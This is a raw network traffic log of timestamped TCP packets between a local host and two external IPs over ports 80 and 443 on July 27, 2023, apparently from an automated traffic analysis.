Jul 27, 2023 01:33:37.580929041 CEST	80	49844	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.582515001 CEST	49843	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.582566977 CEST	49844	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.582923889 CEST	49844	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.627599001 CEST	80	49844	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.632091045 CEST	80	49844	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.638104916 CEST	49844	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.748166084 CEST	49844	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.748847961 CEST	49845	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.793272018 CEST	80	49844	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.793354034 CEST	80	49845	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.793376923 CEST	49844	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.793472052 CEST	49845	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.794080019 CEST	49845	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.838696003 CEST	80	49845	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.850522041 CEST	80	49845	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:37.851603031 CEST	49845	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.962778091 CEST	49845	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:37.963967085 CEST	49846	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.009576082 CEST	80	49845	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.010174036 CEST	80	49846	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.025574923 CEST	49845	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.025768995 CEST	49846	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.088419914 CEST	49846	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.132740974 CEST	80	49846	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.290343046 CEST	80	49846	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.290442944 CEST	49846	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.403755903 CEST	49846	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.404649019 CEST	49847	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.448488951 CEST	80	49846	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.448618889 CEST	49846	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.452604055 CEST	80	49847	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.453747034 CEST	49847	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.454371929 CEST	49847	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.499425888 CEST	80	49847	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.503401995 CEST	80	49847	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.503509045 CEST	49847	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.620395899 CEST	49847	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.624980927 CEST	49848	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.665262938 CEST	80	49847	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.668994904 CEST	80	49848	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.669074059 CEST	49847	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.669148922 CEST	49848	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.669687986 CEST	49848	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.713646889 CEST	80	49848	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.717765093 CEST	80	49848	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.718787909 CEST	49848	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.841950893 CEST	49848	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.842777967 CEST	49849	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.886003017 CEST	80	49848	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.886122942 CEST	49848	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.887533903 CEST	80	49849	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.891204119 CEST	49849	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.892254114 CEST	49849	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:38.936878920 CEST	80	49849	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.941349030 CEST	80	49849	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:38.947871923 CEST	49849	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.078691006 CEST	49849	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.082251072 CEST	49850	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.123533010 CEST	80	49849	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.126492977 CEST	80	49850	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.129861116 CEST	49849	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.129924059 CEST	49850	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.133259058 CEST	49850	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.177504063 CEST	80	49850	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.181709051 CEST	80	49850	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.188541889 CEST	49850	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.302450895 CEST	49850	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.304780960 CEST	49851	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.346889973 CEST	80	49850	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.348756075 CEST	49850	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.349533081 CEST	80	49851	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.349734068 CEST	49851	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.352269888 CEST	49851	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.396971941 CEST	80	49851	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.402165890 CEST	80	49851	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.402312040 CEST	49851	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.555254936 CEST	49851	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.556014061 CEST	49852	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.600126982 CEST	80	49851	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.600161076 CEST	80	49852	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.601227999 CEST	49851	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.601274014 CEST	49852	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.601746082 CEST	49852	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.645986080 CEST	80	49852	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.649926901 CEST	80	49852	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.650172949 CEST	49852	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.784571886 CEST	49852	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.785612106 CEST	49853	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.832506895 CEST	80	49852	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.832564116 CEST	80	49853	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.832614899 CEST	49852	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.832896948 CEST	49853	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.833369017 CEST	49853	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.877480030 CEST	80	49853	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.881984949 CEST	80	49853	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:39.891613960 CEST	49853	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:39.893269062 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:39.893316984 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:39.893486023 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:39.986676931 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:39.986737967 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:40.000385046 CEST	49853	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.001290083 CEST	49855	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.044500113 CEST	80	49853	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.045209885 CEST	80	49855	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.055706978 CEST	49853	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.055825949 CEST	49855	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.061626911 CEST	49855	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.105834961 CEST	80	49855	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.109918118 CEST	80	49855	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.110047102 CEST	49855	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.219836950 CEST	49855	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.220705032 CEST	49856	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.263854027 CEST	80	49855	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.263940096 CEST	49855	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.265259981 CEST	80	49856	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.265362024 CEST	49856	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.273636103 CEST	49856	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.318021059 CEST	80	49856	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.321970940 CEST	80	49856	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.322592974 CEST	49856	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.441354036 CEST	49856	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.442253113 CEST	49857	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.485699892 CEST	80	49856	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.486957073 CEST	80	49857	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.488349915 CEST	49856	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.488409042 CEST	49857	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.489109039 CEST	49857	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.533683062 CEST	80	49857	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.538098097 CEST	80	49857	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.539962053 CEST	49857	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.635910034 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:40.636012077 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:40.641556978 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:40.641581059 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:40.641942024 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:40.644649029 CEST	49857	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.660226107 CEST	49858	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.689536095 CEST	80	49857	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.690892935 CEST	49857	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.704760075 CEST	80	49858	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.704914093 CEST	49858	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.705246925 CEST	49858	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.706538916 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:40.749377012 CEST	80	49858	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.752846956 CEST	80	49858	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.760234118 CEST	49858	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.877578020 CEST	49858	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.922025919 CEST	80	49858	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.922100067 CEST	49858	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.935858011 CEST	49859	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.979926109 CEST	80	49859	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:40.980726957 CEST	49859	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:40.981142044 CEST	49859	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.025842905 CEST	80	49859	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.029234886 CEST	80	49859	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.029702902 CEST	49859	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.147396088 CEST	49859	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.148211002 CEST	49860	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.191505909 CEST	80	49859	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.191607952 CEST	49859	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.192531109 CEST	80	49860	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.192696095 CEST	49860	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.193057060 CEST	49860	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.227546930 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.237358093 CEST	80	49860	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.241466045 CEST	80	49860	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.242753029 CEST	49860	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.268296003 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.352991104 CEST	49860	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.353806973 CEST	49861	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.397643089 CEST	80	49860	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.398068905 CEST	80	49861	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.398293018 CEST	49860	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.398360968 CEST	49861	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.399019003 CEST	49861	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.443325996 CEST	80	49861	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.448220015 CEST	80	49861	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.448343992 CEST	49861	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.555738926 CEST	49861	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.556451082 CEST	49862	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.559684038 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.559820890 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.559858084 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.559890985 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.559952021 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.559986115 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.560508013 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.560553074 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.560575962 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.560692072 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.561798096 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.561944962 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.600028992 CEST	80	49861	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.600331068 CEST	80	49862	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.600944042 CEST	49861	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.600980043 CEST	49862	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.602068901 CEST	49862	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.646015882 CEST	80	49862	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.650209904 CEST	80	49862	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.650329113 CEST	49862	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.725419044 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.725457907 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.725637913 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.725682974 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.725954056 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.725977898 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.727112055 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.727144957 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.727195024 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.727207899 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.727760077 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.728032112 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.757581949 CEST	49862	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.759058952 CEST	49863	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.801803112 CEST	80	49862	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.802634954 CEST	49862	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.803107023 CEST	80	49863	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.812156916 CEST	49863	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.813832998 CEST	49863	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.857796907 CEST	80	49863	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.862087011 CEST	80	49863	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:41.863727093 CEST	49863	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.892055988 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.892148018 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.892275095 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.892318010 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.892369986 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.892424107 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.892627001 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.892668009 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.892673016 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.892695904 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.892855883 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.892913103 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.893060923 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.893085957 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.893105030 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.893122911 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.893143892 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.893157005 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.893208027 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.893219948 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.893285990 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.893340111 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.893352032 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.893368006 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:41.893400908 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:41.980263948 CEST	49863	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:41.981194019 CEST	49864	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.001218081 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.024409056 CEST	80	49863	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.024528027 CEST	49863	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.025863886 CEST	80	49864	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.025968075 CEST	49864	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.026441097 CEST	49864	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.057562113 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.057578087 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.057600975 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.057610989 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.057729959 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.057740927 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.057773113 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.057784081 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058067083 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.058104038 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058212996 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058247089 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058265924 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058284998 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058413029 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.058510065 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058540106 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058547020 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058571100 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058705091 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.058727026 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058788061 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058789015 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.058816910 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.058825016 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058837891 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058854103 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.058861971 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.058887005 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.059159994 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.059194088 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.059474945 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.059535027 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.059557915 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.059578896 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.059689045 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.059706926 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.059722900 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.059729099 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.059771061 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.060002089 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.060029030 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.060260057 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.060347080 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.060555935 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.060595036 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.060642958 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.060664892 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.060702085 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.060750008 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.060784101 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.060816050 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.060864925 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.060997963 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.061517000 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.061543941 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.061567068 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.061852932 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.062131882 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.071918964 CEST	80	49864	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.075756073 CEST	80	49864	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.075930119 CEST	49864	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.187167883 CEST	49864	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.188364983 CEST	49865	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.223090887 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.223129034 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.223326921 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.223376036 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.223495007 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.223519087 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.223541975 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.223618031 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.223870993 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.223897934 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.226670027 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.226701021 CEST	443	49854	108.181.20.35	192.168.2.5
